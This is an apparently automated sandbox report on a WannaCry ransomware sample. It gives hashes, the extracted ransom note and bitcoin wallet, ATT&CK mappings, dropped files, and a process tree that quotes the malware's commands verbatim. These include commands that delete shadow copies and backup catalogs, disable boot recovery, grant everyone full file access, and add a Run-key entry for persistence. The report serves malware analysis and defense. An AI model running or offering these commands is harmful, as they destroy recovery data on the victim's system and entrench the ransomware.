wannacry | 7846adeae0737e0ae55d0045adeb644c27745c2d0f1af92c56a9e4351e881451

Analysis

max time kernel
147s
max time network
148s
platform
windows7_x64
resource
win7
submitted
14-07-2020 07:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.vbs
Size

589B
MD5

94d9611bf2c6e0caa430b1b0b808da1e
SHA1

723de46bdda58dd345b0c0bfd8bdbc33ea1931ec
SHA256

8cf91cb3c0524feabe3b9502aa36ec58003e9e0db849901948cd335caf0e4f66
SHA512

6baddf54c364c1c39bccd4f3e78f2b97f62297382c46642f6fc921fb2bc950e3ee44c6f94b5447c13faa028d9bc706ee9784582188e7a07fd3805de836b63e8e

Score

10^/10

ransomware worm wannacry spyware discovery persistence

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

vssvc.exeWMIC.exetaskse.exetaskse.exetaskse.exetaskse.exe

description	pid	process
Token: SeBackupPrivilege	1856	vssvc.exe
Token: SeRestorePrivilege	1856	vssvc.exe
Token: SeAuditPrivilege	1856	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1628	WMIC.exe
Token: SeSecurityPrivilege	1628	WMIC.exe
Token: SeTakeOwnershipPrivilege	1628	WMIC.exe
Token: SeLoadDriverPrivilege	1628	WMIC.exe
Token: SeSystemProfilePrivilege	1628	WMIC.exe
Token: SeSystemtimePrivilege	1628	WMIC.exe
Token: SeProfSingleProcessPrivilege	1628	WMIC.exe
Token: SeIncBasePriorityPrivilege	1628	WMIC.exe
Token: SeCreatePagefilePrivilege	1628	WMIC.exe
Token: SeBackupPrivilege	1628	WMIC.exe
Token: SeRestorePrivilege	1628	WMIC.exe
Token: SeShutdownPrivilege	1628	WMIC.exe
Token: SeDebugPrivilege	1628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1628	WMIC.exe
Token: SeRemoteShutdownPrivilege	1628	WMIC.exe
Token: SeUndockPrivilege	1628	WMIC.exe
Token: SeManageVolumePrivilege	1628	WMIC.exe
Token: 33	1628	WMIC.exe
Token: 34	1628	WMIC.exe
Token: 35	1628	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1628	WMIC.exe
Token: SeSecurityPrivilege	1628	WMIC.exe
Token: SeTakeOwnershipPrivilege	1628	WMIC.exe
Token: SeLoadDriverPrivilege	1628	WMIC.exe
Token: SeSystemProfilePrivilege	1628	WMIC.exe
Token: SeSystemtimePrivilege	1628	WMIC.exe
Token: SeProfSingleProcessPrivilege	1628	WMIC.exe
Token: SeIncBasePriorityPrivilege	1628	WMIC.exe
Token: SeCreatePagefilePrivilege	1628	WMIC.exe
Token: SeBackupPrivilege	1628	WMIC.exe
Token: SeRestorePrivilege	1628	WMIC.exe
Token: SeShutdownPrivilege	1628	WMIC.exe
Token: SeDebugPrivilege	1628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1628	WMIC.exe
Token: SeRemoteShutdownPrivilege	1628	WMIC.exe
Token: SeUndockPrivilege	1628	WMIC.exe
Token: SeManageVolumePrivilege	1628	WMIC.exe
Token: 33	1628	WMIC.exe
Token: 34	1628	WMIC.exe
Token: 35	1628	WMIC.exe
Token: SeTcbPrivilege	1584	taskse.exe
Token: SeTcbPrivilege	1584	taskse.exe
Token: SeTcbPrivilege	824	taskse.exe
Token: SeTcbPrivilege	824	taskse.exe
Token: SeTcbPrivilege	576	taskse.exe
Token: SeTcbPrivilege	576	taskse.exe
Token: SeTcbPrivilege	588	taskse.exe
Token: SeTcbPrivilege	588	taskse.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1536 attrib.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

1524 icacls.exe
Deletes itself 1 IoCs

Processes:

WScript.exe

pid process

608 WScript.exe

pid	process
1536	attrib.exe

pid	process
1524	icacls.exe

pid	process
608	WScript.exe

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]

pid	process
1492	@[email protected]
1040	@[email protected]
1040	@[email protected]
1492	@[email protected]
1904	@[email protected]
1904	@[email protected]
1040	@[email protected]
1364	@[email protected]
2012	@[email protected]

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

important.exe@[email protected]

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	important.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe

Suspicious use of WriteProcessMemory 108 IoCs

Processes:

WScript.exeimportant.execmd.execmd.exe@[email protected]@[email protected]cmd.exe

description	pid	process	target process
PID 608 wrote to memory of 1064	608	WScript.exe	important.exe
PID 608 wrote to memory of 1064	608	WScript.exe	important.exe
PID 608 wrote to memory of 1064	608	WScript.exe	important.exe
PID 608 wrote to memory of 1064	608	WScript.exe	important.exe
PID 1064 wrote to memory of 1536	1064	important.exe	attrib.exe
PID 1064 wrote to memory of 1536	1064	important.exe	attrib.exe
PID 1064 wrote to memory of 1536	1064	important.exe	attrib.exe
PID 1064 wrote to memory of 1536	1064	important.exe	attrib.exe
PID 1064 wrote to memory of 1524	1064	important.exe	icacls.exe
PID 1064 wrote to memory of 1524	1064	important.exe	icacls.exe
PID 1064 wrote to memory of 1524	1064	important.exe	icacls.exe
PID 1064 wrote to memory of 1524	1064	important.exe	icacls.exe
PID 1064 wrote to memory of 1548	1064	important.exe	taskdl.exe
PID 1064 wrote to memory of 1548	1064	important.exe	taskdl.exe
PID 1064 wrote to memory of 1548	1064	important.exe	taskdl.exe
PID 1064 wrote to memory of 1548	1064	important.exe	taskdl.exe
PID 1064 wrote to memory of 1936	1064	important.exe	cmd.exe
PID 1064 wrote to memory of 1936	1064	important.exe	cmd.exe
PID 1064 wrote to memory of 1936	1064	important.exe	cmd.exe
PID 1064 wrote to memory of 1936	1064	important.exe	cmd.exe
PID 1936 wrote to memory of 1896	1936	cmd.exe	cscript.exe
PID 1936 wrote to memory of 1896	1936	cmd.exe	cscript.exe
PID 1936 wrote to memory of 1896	1936	cmd.exe	cscript.exe
PID 1936 wrote to memory of 1896	1936	cmd.exe	cscript.exe
PID 1064 wrote to memory of 1492	1064	important.exe	@[email protected]
PID 1064 wrote to memory of 1492	1064	important.exe	@[email protected]
PID 1064 wrote to memory of 1492	1064	important.exe	@[email protected]
PID 1064 wrote to memory of 1492	1064	important.exe	@[email protected]
PID 1064 wrote to memory of 1344	1064	important.exe	cmd.exe
PID 1064 wrote to memory of 1344	1064	important.exe	cmd.exe
PID 1064 wrote to memory of 1344	1064	important.exe	cmd.exe
PID 1064 wrote to memory of 1344	1064	important.exe	cmd.exe
PID 1344 wrote to memory of 1040	1344	cmd.exe	@[email protected]
PID 1344 wrote to memory of 1040	1344	cmd.exe	@[email protected]
PID 1344 wrote to memory of 1040	1344	cmd.exe	@[email protected]
PID 1344 wrote to memory of 1040	1344	cmd.exe	@[email protected]
PID 1492 wrote to memory of 1532	1492	@[email protected]	taskhsvc.exe
PID 1492 wrote to memory of 1532	1492	@[email protected]	taskhsvc.exe
PID 1492 wrote to memory of 1532	1492	@[email protected]	taskhsvc.exe
PID 1492 wrote to memory of 1532	1492	@[email protected]	taskhsvc.exe
PID 1040 wrote to memory of 1224	1040	@[email protected]	cmd.exe
PID 1040 wrote to memory of 1224	1040	@[email protected]	cmd.exe
PID 1040 wrote to memory of 1224	1040	@[email protected]	cmd.exe
PID 1040 wrote to memory of 1224	1040	@[email protected]	cmd.exe
PID 1224 wrote to memory of 1500	1224	cmd.exe	vssadmin.exe
PID 1224 wrote to memory of 1500	1224	cmd.exe	vssadmin.exe
PID 1224 wrote to memory of 1500	1224	cmd.exe	vssadmin.exe
PID 1224 wrote to memory of 1500	1224	cmd.exe	vssadmin.exe
PID 1224 wrote to memory of 1628	1224	cmd.exe	WMIC.exe
PID 1224 wrote to memory of 1628	1224	cmd.exe	WMIC.exe
PID 1224 wrote to memory of 1628	1224	cmd.exe	WMIC.exe
PID 1224 wrote to memory of 1628	1224	cmd.exe	WMIC.exe
PID 1064 wrote to memory of 652	1064	important.exe	taskdl.exe
PID 1064 wrote to memory of 652	1064	important.exe	taskdl.exe
PID 1064 wrote to memory of 652	1064	important.exe	taskdl.exe
PID 1064 wrote to memory of 652	1064	important.exe	taskdl.exe
PID 1064 wrote to memory of 1584	1064	important.exe	taskse.exe
PID 1064 wrote to memory of 1584	1064	important.exe	taskse.exe
PID 1064 wrote to memory of 1584	1064	important.exe	taskse.exe
PID 1064 wrote to memory of 1584	1064	important.exe	taskse.exe
PID 1064 wrote to memory of 1904	1064	important.exe	@[email protected]
PID 1064 wrote to memory of 1904	1064	important.exe	@[email protected]
PID 1064 wrote to memory of 1904	1064	important.exe	@[email protected]
PID 1064 wrote to memory of 1904	1064	important.exe	@[email protected]

Executes dropped EXE 17 IoCs

Processes:

important.exetaskdl.exe@[email protected]@[email protected]taskhsvc.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]

pid	process
1064	important.exe
1548	taskdl.exe
1492	@[email protected]
1040	@[email protected]
1532	taskhsvc.exe
652	taskdl.exe
1584	taskse.exe
1904	@[email protected]
1184	taskdl.exe
824	taskse.exe
1040	@[email protected]
1788	taskdl.exe
576	taskse.exe
1364	@[email protected]
1056	taskdl.exe
588	taskse.exe
2012	@[email protected]

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

taskhsvc.exe

pid process

1532 taskhsvc.exe
1532 taskhsvc.exe
1532 taskhsvc.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

@[email protected]

pid process

1904 @[email protected]
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1972 reg.exe
Blacklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

5 608 WScript.exe

pid	process
1532	taskhsvc.exe
1532	taskhsvc.exe
1532	taskhsvc.exe

pid	process
1904	@[email protected]

pid	process
1972	reg.exe

flow	pid	process
5	608	WScript.exe

Loads dropped DLL 39 IoCs

Processes:

important.execscript.execmd.exe@[email protected]taskhsvc.exe

pid	process
1064	important.exe
1064	important.exe
1896	cscript.exe
1064	important.exe
1064	important.exe
1344	cmd.exe
1344	cmd.exe
1492	@[email protected]
1492	@[email protected]
1532	taskhsvc.exe
1532	taskhsvc.exe
1532	taskhsvc.exe
1532	taskhsvc.exe
1532	taskhsvc.exe
1532	taskhsvc.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe
1064	important.exe

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1500 vssadmin.exe

pid	process
1500	vssadmin.exe

Drops startup file 2 IoCs

Processes:

important.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD1F1C.tmp	important.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD1F30.tmp	important.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Adds Run entry to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\pzkqrqnhucon571 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\""	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.vbs"
1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
PID:608
- C:\Users\Admin\AppData\Local\Temp\important.exe
  "C:\Users\Admin\AppData\Local\Temp\important.exe"
  2⤵
  - Sets desktop wallpaper using registry
  - Suspicious use of WriteProcessMemory
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops startup file
  PID:1064
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - Views/modifies file attributes
    PID:1536
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:1524
- - C:\Users\Admin\AppData\Local\Temp\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c 55101594711943.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Windows\SysWOW64\cscript.exe
      cscript.exe //nologo m.vbs
      4⤵
      Loads dropped DLL
      PID:1896
- - C:\Users\Admin\AppData\Local\Temp\@[email protected]
    @[email protected] co
    3⤵
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1492
  - - C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
      TaskData\Tor\taskhsvc.exe
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Loads dropped DLL
      PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b @[email protected] vs
    3⤵
    - Suspicious use of WriteProcessMemory
    - Loads dropped DLL
    PID:1344
  - - C:\Users\Admin\AppData\Local\Temp\@[email protected]
      @[email protected] vs
      4⤵
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      Executes dropped EXE
      PID:1040
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1224
      - C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        6⤵
        Interacts with shadow copies
        
        PID:1500
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1628
- - C:\Users\Admin\AppData\Local\Temp\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:652
- - C:\Users\Admin\AppData\Local\Temp\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Executes dropped EXE
    PID:1584
- - C:\Users\Admin\AppData\Local\Temp\@[email protected]
    @[email protected]
    3⤵
    - Suspicious use of SetWindowsHookEx
    - Sets desktop wallpaper using registry
    - Executes dropped EXE
    - Suspicious behavior: GetForegroundWindowSpam
    PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "pzkqrqnhucon571" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
    3⤵
    PID:1916
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "pzkqrqnhucon571" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
      4⤵
      Modifies registry key
      Adds Run entry to start application
      PID:1972
- - C:\Users\Admin\AppData\Local\Temp\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Executes dropped EXE
    PID:824
- - C:\Users\Admin\AppData\Local\Temp\@[email protected]
    @[email protected]
    3⤵
    - Suspicious use of SetWindowsHookEx
    - Executes dropped EXE
    PID:1040
- - C:\Users\Admin\AppData\Local\Temp\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:1788
- - C:\Users\Admin\AppData\Local\Temp\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Executes dropped EXE
    PID:576
- - C:\Users\Admin\AppData\Local\Temp\@[email protected]
    @[email protected]
    3⤵
    - Suspicious use of SetWindowsHookEx
    - Executes dropped EXE
    PID:1364
- - C:\Users\Admin\AppData\Local\Temp\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:1056
- - C:\Users\Admin\AppData\Local\Temp\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Executes dropped EXE
    PID:588
- - C:\Users\Admin\AppData\Local\Temp\@[email protected]
    @[email protected]
    3⤵
    - Suspicious use of SetWindowsHookEx
    - Executes dropped EXE
    PID:2012

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1856

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\00000000.res

Download Submit
C:\Users\Admin\AppData\Local\Temp\00000000.res

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\10.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\11.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\12.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\13.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\14.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\15.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\16.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\17.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\18.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\19.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\20.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\21.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\22.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\23.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\24.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\4.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\5.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\55101594711943.bat

Download Submit
C:\Users\Admin\AppData\Local\Temp\6.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\7.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\8.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\9.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\LIBEAY32.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\SSLEAY32.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\b.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\important.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\important.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\m.vbs

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_bulgarian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (simplified).wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (traditional).wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_croatian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_czech.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_danish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_dutch.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_english.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_filipino.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_finnish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_french.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_german.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_greek.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_indonesian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_italian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_japanese.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_korean.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_latvian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_norwegian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_polish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_portuguese.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_romanian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_russian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_slovak.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_spanish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_swedish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_turkish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_vietnamese.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\r.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\t.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\u.wnry

Download Submit
C:\Users\Admin\Desktop\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libeay32.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\ssleay32.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
memory/576-775-0x0000000000000000-mapping.dmp

Download
memory/588-787-0x0000000000000000-mapping.dmp

